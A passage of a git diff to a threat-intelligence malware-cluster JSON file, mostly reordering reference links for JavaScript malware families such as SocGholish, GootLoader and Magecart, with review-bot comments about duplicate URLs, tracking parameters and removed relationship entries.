- "https://www.zscaler.com/blogs/security-research/return-evilnum-apt-updated-ttps-and-new-targets",
- "https://securelist.com/deathstalker-mercenary-triumvirate/98177/",
- "https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf"
+ "https://securelist.com/deathstalker-mercenary-triumvirate/98177/"
],
"synonyms": [],
"type": []
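Review bot: the new EvilNum description opens with `According proofpoint, EvilNum is a backdoor ...`; it is missing the word `to` and the vendor name should be capitalised: `According to Proofpoint, EvilNum is a backdoor ...`. The text is attributed to Proofpoint but no Proofpoint URL appears in the refs, so adding the source it was paraphrased from would let readers verify it.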
@@ -7502,27 +7980,29 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.fakeupdates",
+ "https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html",
+ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
+ "https://www.lac.co.jp/lacwatch/report/20220407_002923.html",
+ "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee",
+ "https://www.sentinelone.com/labs/socgholish-diversifies-and-expands-its-malware-staging-infrastructure-to-counter-defenders/",
"https://www.mandiant.com/resources/they-come-in-the-night-ransomware-deployment-trends",
- "https://www.digitalinformationworld.com/2022/04/threatening-redirect-web-service.html",
- "https://www.menlosecurity.com/blog/increase-in-attack-socgholish",
+ "https://thehackernews.com/2022/07/microsoft-links-raspberry-robin-usb.html?_m=3n%2e009a%2e2800%2ejp0ao0cjb8%2e1shm",
"https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/",
- "https://blog.malwarebytes.com/threat-analysis/2018/04/fakeupdates-campaign-leverages-multiple-website-platforms/",
- "https://twitter.com/MsftSecIntel/status/1522690116979855360",
- "https://blog.sucuri.net/2022/08/socgholish-5-years-of-massive-website-infections.html",
+ "https://www.digitalinformationworld.com/2022/04/threatening-redirect-web-service.html",
"https://blog.malwarebytes.com/threat-intelligence/2022/06/makemoney-malvertising-campaign-adds-fake-update-template/",
"https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt",
- "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee",
- "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack",
- "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://www.cybereason.com/blog/threat-analysis-report-socgholish-and-zloader-from-fake-updates-and-installers-to-owning-your-systems",
- "https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html",
- "https://expel.io/blog/incident-report-spotting-socgholish-wordpress-injection/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf",
- "https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://blog.malwarebytes.com/threat-analysis/2018/04/fakeupdates-campaign-leverages-multiple-website-platforms/",
"https://experience.mandiant.com/trending-evil/p/1",
- "https://www.lac.co.jp/lacwatch/report/20220407_002923.html",
- "https://thehackernews.com/2022/07/microsoft-links-raspberry-robin-usb.html?_m=3n%2e009a%2e2800%2ejp0ao0cjb8%2e1shm"
+ "https://twitter.com/MsftSecIntel/status/1522690116979855360",
+ "https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://expel.io/blog/incident-report-spotting-socgholish-wordpress-injection/",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/",
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf",
+ "https://www.menlosecurity.com/blog/increase-in-attack-socgholish",
+ "https://blog.sucuri.net/2022/08/socgholish-5-years-of-massive-website-infections.html",
+ "https://www.cybereason.com/blog/threat-analysis-report-socgholish-and-zloader-from-fake-updates-and-installers-to-owning-your-systems"
],
"synonyms": [
"FakeUpdate",
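Review bot: the thehackernews ref carries a tracking query string (`?_m=3n%2e009a%2e2800%2ejp0ao0cjb8%2e1shm`) that is not part of the article's identity; strip it to the bare URL so the list does not accumulate per-visitor parameters and produce duplicates when the same article is added again later.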
@@ -7530,15 +8010,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "cd32b19e-c365-4efc-9998-548e50e04a4c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "cff35ce3-8d6f-417b-ae6c-a9e6a60ee26c",
"value": "FAKEUPDATES"
},
@@ -7547,30 +8018,25 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.gootloader",
- "https://threatresearch.ext.hp.com/tips-for-automating-ioc-extraction-from-gootloader-a-changing-javascript-malware/",
+ "https://dinohacks.blogspot.com/2022/06/loading-gootloader.html",
"https://blogs.blackberry.com/en/2022/07/gootloader-from-seo-poisoning-to-multi-stage-downloader",
- "https://news.sophos.com/en-us/2021/08/12/gootloaders-mothership-controls-malicious-content/",
- "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
- "https://blog.nviso.eu/2022/07/20/analysis-of-a-trojanized-jquery-script-gootloader-unleashed/",
- "https://community.riskiq.com/article/f5d5ed38",
- "https://redcanary.com/blog/gootloader",
- "https://experience.mandiant.com/trending-evil/p/1",
- "https://labs.sentinelone.com/gootloader-initial-access-as-a-service-platform-expands-its-search-for-high-value-targets/",
"https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf",
- "https://dinohacks.blogspot.com/2022/06/loading-gootloader.html"
+ "https://www.esentire.com/web-native-pages/gootloader-unloaded",
+ "https://labs.sentinelone.com/gootloader-initial-access-as-a-service-platform-expands-its-search-for-high-value-targets/",
+ "https://www.mandiant.com/resources/blog/tracking-evolution-gootloader-operations",
+ "https://experience.mandiant.com/trending-evil/p/1",
+ "https://www.esentire.com/blog/gootloader-leads-to-cobalt-strike-and-hand-on-keyboard-activity",
+ "https://www.esentire.com/blog/gootloader-striking-with-a-new-infection-technique",
+ "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
+ "https://redcanary.com/blog/gootloader",
+ "https://threatresearch.ext.hp.com/tips-for-automating-ioc-extraction-from-gootloader-a-changing-javascript-malware/",
+ "https://blog.nviso.eu/2022/07/20/analysis-of-a-trojanized-jquery-script-gootloader-unleashed/",
+ "https://news.sophos.com/en-us/2021/08/12/gootloaders-mothership-controls-malicious-content/",
+ "https://community.riskiq.com/article/f5d5ed38"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "0bdb6f1c-1229-4556-a535-7444ddfbd7a9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "5b2569e5-aeb2-4708-889f-c6d598bd5e14",
"value": "GootLoader"
},
@@ -7580,8 +8046,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.grelos",
"https://www.riskiq.com/blog/labs/magecart-medialand/",
- "https://community.riskiq.com/article/8c4b4a7a",
- "https://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745"
+ "https://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745",
+ "https://community.riskiq.com/article/8c4b4a7a"
],
"synonyms": [],
"type": []
@@ -7594,20 +8060,20 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.secureworks.com/research/threat-profiles/gold-niagara",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
+ "https://www.mandiant.com/resources/evolution-of-fin7",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
"https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/",
"https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
"https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
- "https://www.mandiant.com/resources/evolution-of-fin7",
"https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/",
- "https://twitter.com/ItsReallyNick/status/1059898708286939136"
+ "https://twitter.com/ItsReallyNick/status/1059898708286939136",
+ "https://www.secureworks.com/research/threat-profiles/gold-niagara",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/"
],
"synonyms": [
"Harpy"
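Review bot: the two Microsoft refs differ only by a trailing slash (`.../how-to-protect-yourself` and `.../how-to-protect-yourself/`) and point at the same article; keep one. The CrowdStrike Sprite Spider URL still carries `?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout`, which should be stripped for the same reason.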
@@ -7675,10 +8141,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.kopiluwak",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
"https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack",
"https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
"https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
+ "https://pdfhost.io/v/F0@QElMu2_MacProStorage_2017FinalBitdefenderWhitepaperNetrepserA4en_ENBitdefenderWhitepaperNetrepserA4en_ENindd.pdf",
+ "https://www.mandiant.com/resources/blog/turla-galaxy-opportunity",
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/",
+ "https://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html"
],
"synonyms": [],
"type": []
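Review bot: the Bitdefender Netrepser whitepaper is referenced via a pdfhost.io upload rather than a Bitdefender-controlled URL; a third-party file host can disappear or serve different content later, so prefer the vendor's own link (or an archive.org snapshot of it) if one is available.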
@@ -7687,14 +8157,14 @@
"value": "KopiLuwak"
},
{
- "description": "",
+ "description": "The LNKR trojan is a malicious browser extension that will monitor the websites visited by the user, looking for pages with administrative privileges such as blog sites or web-based virtual learning environments. When the administrative user posts to the page, the infected extension will execute stored cross-site scripting attack and injects malicious JavaScript into the legitimate HTML of the page. This is used to redirect the second-party visitors of the site to both benign and malicious domains. ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.lnkr",
- "https://krebsonsecurity.com/2020/03/the-case-for-limiting-your-browser-extensions/",
"https://github.com/Zenexer/lnkr/blob/master/recon/extensions/fanagokoaogopceablgmpndejhedkjjb/README.md",
+ "https://www.riskiq.com/blog/labs/lnkr-browser-extension/",
"https://github.com/Zenexer/lnkr",
- "https://www.riskiq.com/blog/labs/lnkr-browser-extension/"
+ "https://krebsonsecurity.com/2020/03/the-case-for-limiting-your-browser-extensions/"
],
"synonyms": [],
"type": []
@@ -7708,63 +8178,64 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart",
"https://maxkersten.nl/2020/02/24/closing-in-on-magecart-12/",
- "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
- "https://blog.malwarebytes.com/cybercrime/2021/05/newly-observed-php-based-skimmer-shows-ongoing-magecart-group-12-activity/",
- "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://maxkersten.nl/2020/01/20/ticket-resellers-infected-with-a-credit-card-skimmer/",
"https://marcoramilli.com/2020/02/19/uncovering-new-magecart-implant-attacking-ecommerce/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/mirrorthief-group-uses-magecart-skimming-attack-to-hit-hundreds-of-campus-online-stores-in-us-and-canada/",
"https://www.crowdstrike.com/blog/threat-actor-magecart-coming-to-an-ecommerce-store-near-you/",
- "https://www.perimeterx.com/blog/analyzing_magecart_malware_from_zero_to_hero/",
- "https://community.riskiq.com/article/743ea75b/description",
"https://maxkersten.nl/2020/02/17/following-the-tracks-of-magecart-12/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0719.pdf",
- "https://sansec.io/research/north-korea-magecart",
- "https://blog.sucuri.net/2020/07/skimmers-in-images-github-repos.html",
- "https://www.reflectiz.com/the-gocgle-web-skimming-campaign/",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://www.goggleheadedhacker.com/blog/post/14",
- "https://www.riskiq.com/blog/labs/magecart-nutribullet/",
- "https://twitter.com/AffableKraut/status/1415425132080816133?s=20",
- "https://twitter.com/MBThreatIntel/status/1416101496022724609",
- "https://www.reflectiz.com/ico-fines-ticketmaster-uk-1-25-million-for-security-failures-a-lesson-to-be-learned/",
- "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/",
- "https://blog.malwarebytes.com/cybercrime/2019/04/github-hosted-magecart-skimmer-used-against-hundreds-of-e-commerce-sites/",
- "https://www.riskiq.com/blog/labs/magecart-medialand/",
- "https://blog.malwarebytes.com/threat-intelligence/2021/11/credit-card-skimmer-evades-virtual-machines/",
- "https://geminiadvisory.io/magecart-google-tag-manager/",
- "https://community.riskiq.com/article/fda1f967",
- "https://sansec.io/research/magento-2-persistent-parasite",
- "https://community.riskiq.com/article/2efc2782",
"https://scotthelme.co.uk/introducing-script-watch-detect-magecart-style-attacks-fast/?utm_source=dlvr.it&utm_medium=twitter",
- "https://www.riskiq.com/blog/labs/magecart-group-12-olympics/",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/injecting-magecart-into-magento-global-config/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/magecart-skimming-attack-targets-mobile-users-of-hotel-chain-booking-websites/",
"https://sansec.io/research/magecart-corona-lockdown",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/us-local-government-services-targeted-by-new-magecart-credit-card-skimming-attack/",
- "https://www.riskiq.com/blog/labs/magecart-group-4-always-advancing/",
- "https://community.riskiq.com/article/017cf2e6",
- "https://www.riskiq.com/blog/labs/misconfigured-s3-buckets/",
- "https://sansec.io/labs/2020/01/25/magecart-hackers-arrested/",
"https://community.riskiq.com/article/30f22a00",
"https://blog.malwarebytes.com/threat-analysis/2020/06/web-skimmer-hides-within-exif-metadata-exfiltrates-credit-cards-via-image-files/",
- "https://blog.malwarebytes.com/cybercrime/2021/06/lil-skimmer-the-magecart-impersonator/",
- "https://blog.sucuri.net/2020/06/evasion-tactics-in-hybrid-credit-card-skimmers.html",
- "https://blog.malwarebytes.com/threat-intelligence/2021/09/the-many-tentacles-of-magecart-group-8/",
- "https://www.zdnet.com/article/web-skimmers-found-on-the-websites-of-intersport-claires-and-icing/",
"https://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/",
- "https://medium.com/reflectiz/csp-the-right-solution-for-the-web-skimming-pandemic-acb7a4414218",
- "https://community.riskiq.com/article/14924d61",
- "https://community.riskiq.com/article/5bea32aa",
+ "https://www.perimeterx.com/blog/analyzing_magecart_malware_from_zero_to_hero/",
+ "https://www.reflectiz.com/the-gocgle-web-skimming-campaign/",
+ "https://www.riskiq.com/blog/labs/magecart-group-4-always-advancing/",
+ "https://www.riskiq.com/blog/labs/misconfigured-s3-buckets/",
+ "https://blog.malwarebytes.com/cybercrime/2021/06/lil-skimmer-the-magecart-impersonator/",
+ "https://community.riskiq.com/article/743ea75b/description",
"https://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/",
- "https://securelist.com/apt-trends-report-q2-2019/91897/",
- "https://twitter.com/AffableKraut/status/1385030485676544001",
"https://geminiadvisory.io/wp-content/uploads/2020/07/Appendix-C-1.pdf",
- "https://blog.malwarebytes.com/threat-intelligence/2021/10/q-logger-skimmer-keeps-magecart-attacks-going/",
- "https://blog.sucuri.net/2021/07/magecart-swiper-uses-unorthodox-concatenation.html",
+ "https://geminiadvisory.io/keeper-magecart-group-infects-570-sites/",
+ "https://community.riskiq.com/article/2efc2782",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0719.pdf",
+ "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
+ "https://www.zdnet.com/article/web-skimmers-found-on-the-websites-of-intersport-claires-and-icing/",
+ "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/",
"https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html",
- "https://geminiadvisory.io/keeper-magecart-group-infects-570-sites/"
+ "https://blog.malwarebytes.com/threat-intelligence/2021/09/the-many-tentacles-of-magecart-group-8/",
+ "https://blog.malwarebytes.com/threat-intelligence/2021/10/q-logger-skimmer-keeps-magecart-attacks-going/",
+ "https://twitter.com/MBThreatIntel/status/1416101496022724609",
+ "https://community.riskiq.com/article/017cf2e6",
+ "https://community.riskiq.com/article/5bea32aa",
+ "https://www.goggleheadedhacker.com/blog/post/14",
+ "https://www.reflectiz.com/ico-fines-ticketmaster-uk-1-25-million-for-security-failures-a-lesson-to-be-learned/",
+ "https://www.zscaler.com/blogs/security-research/black-friday-scams-4-emerging-skimming-attacks-watch-holiday-season",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/us-local-government-services-targeted-by-new-magecart-credit-card-skimming-attack/",
+ "https://www.riskiq.com/blog/labs/magecart-nutribullet/",
+ "https://www.riskiq.com/blog/labs/magecart-group-12-olympics/",
+ "https://twitter.com/AffableKraut/status/1385030485676544001",
+ "https://sansec.io/research/magento-2-persistent-parasite",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/mirrorthief-group-uses-magecart-skimming-attack-to-hit-hundreds-of-campus-online-stores-in-us-and-canada/",
+ "https://community.riskiq.com/article/14924d61",
+ "https://blog.sucuri.net/2021/07/magecart-swiper-uses-unorthodox-concatenation.html",
+ "https://medium.com/reflectiz/csp-the-right-solution-for-the-web-skimming-pandemic-acb7a4414218",
+ "https://sansec.io/labs/2020/01/25/magecart-hackers-arrested/",
+ "https://maxkersten.nl/2020/01/20/ticket-resellers-infected-with-a-credit-card-skimmer/",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://blog.sucuri.net/2020/07/skimmers-in-images-github-repos.html",
+ "https://community.riskiq.com/article/fda1f967",
+ "https://sansec.io/research/north-korea-magecart",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://blog.malwarebytes.com/cybercrime/2019/04/github-hosted-magecart-skimmer-used-against-hundreds-of-e-commerce-sites/",
+ "https://blog.malwarebytes.com/threat-intelligence/2021/11/credit-card-skimmer-evades-virtual-machines/",
+ "https://blog.sucuri.net/2020/06/evasion-tactics-in-hybrid-credit-card-skimmers.html",
+ "https://geminiadvisory.io/magecart-google-tag-manager/",
+ "https://www.riskiq.com/blog/labs/magecart-medialand/",
+ "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/magecart-skimming-attack-targets-mobile-users-of-hotel-chain-booking-websites/",
+ "https://blog.malwarebytes.com/cybercrime/2021/05/newly-observed-php-based-skimmer-shows-ongoing-magecart-group-12-activity/",
+ "https://twitter.com/AffableKraut/status/1415425132080816133?s=20"
],
"synonyms": [],
"type": []
@@ -7790,30 +8261,33 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs",
- "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/",
- "https://blog.morphisec.com/cobalt-gang-2.0",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/",
- "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish",
- "https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire",
+ "https://sec0wn.blogspot.com/2023/03/how-do-you-like-dem-eggs-i-like-mine.html?m=1",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf",
+ "https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware",
"https://www.secureworks.com/research/threat-profiles/gold-kingswood",
"http://www.secureworks.com/research/threat-profiles/gold-kingswood",
+ "https://www.esentire.com/web-native-pages/unmasking-venom-spider",
"https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html",
- "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/",
- "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/",
- "https://expel.com/blog/more-eggs-and-some-linkedin-resume-spearphishing",
- "https://attack.mitre.org/software/S0284/",
- "https://asert.arbornetworks.com/double-the-infection-double-the-fun/",
- "https://github.com/eset/malware-ioc/tree/master/evilnum",
"https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/",
- "https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw",
"https://twitter.com/Arkbird_SOLG/status/1301536930069278727",
+ "https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw",
+ "https://attack.mitre.org/software/S0284/",
"https://www.proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers",
- "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/",
+ "https://asert.arbornetworks.com/double-the-infection-double-the-fun/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://github.com/eset/malware-ioc/tree/master/evilnum",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware",
- "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf"
+ "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/",
+ "https://blog.morphisec.com/cobalt-gang-2.0",
+ "https://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/",
+ "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/",
+ "https://expel.com/blog/more-eggs-and-some-linkedin-resume-spearphishing",
+ "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/",
+ "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish",
+ "https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire",
+ "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/"
],
"synonyms": [
"SKID",
@@ -7829,23 +8303,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.nanhaishu",
- "https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets",
"https://attack.mitre.org/software/S0228/",
- "https://community.spiceworks.com/topic/1028936-stealthy-cyberespionage-campaign-attacks-with-social-engineering"
+ "https://community.spiceworks.com/topic/1028936-stealthy-cyberespionage-campaign-attacks-with-social-engineering",
+ "https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "7abd6950-7a07-4d9e-ade1-62414fa50619",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "3e46af39-52e8-442f-aff1-38eeb90336fc",
"value": "NanHaiShu"
},
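Review bot: this hunk does more than reorder refs: it deletes the `related` block that linked NanHaiShu to `7abd6950-7a07-4d9e-ade1-62414fa50619` with a `similar` relation, which removes a cross-cluster relationship that consumers of the galaxy may depend on. If the generator no longer emits `related` entries for the Malpedia galaxy, say so in the commit message; the same deletion recurs for CpuMeaner and DarthMiner further down.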
@@ -7869,15 +8334,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.ostap",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://malfind.com/index.php/2021/11/24/from-the-archive-1-ostap-dropper-deobfuscation-and-analysis/",
- "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
"https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/",
- "https://www.bromium.com/deobfuscating-ostap-trickbots-javascript-downloader/",
- "https://www.intrinsec.com/deobfuscating-hunting-ostap/",
+ "https://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/",
"https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/deobfuscate_ostap.py",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
- "https://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/"
+ "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
+ "https://www.intrinsec.com/deobfuscating-hunting-ostap/",
+ "https://malfind.com/index.php/2021/11/24/from-the-archive-1-ostap-dropper-deobfuscation-and-analysis/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://www.bromium.com/deobfuscating-ostap-trickbots-javascript-downloader/",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
],
"synonyms": [],
"type": []
@@ -7903,9 +8368,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.peacenotwar",
+ "https://www.vice.com/en/article/dypeek/open-source-sabotage-node-ipc-wipe-russia-belraus-computers",
"https://www.bleepingcomputer.com/news/security/big-sabotage-famous-npm-package-deletes-files-to-protest-ukraine-war/",
- "https://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c",
- "https://www.vice.com/en/article/dypeek/open-source-sabotage-node-ipc-wipe-russia-belraus-computers"
+ "https://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c"
],
"synonyms": [],
"type": []
@@ -7959,12 +8424,12 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.scanbox",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/attacker-tracking-users-seeking-pakistani-passport/",
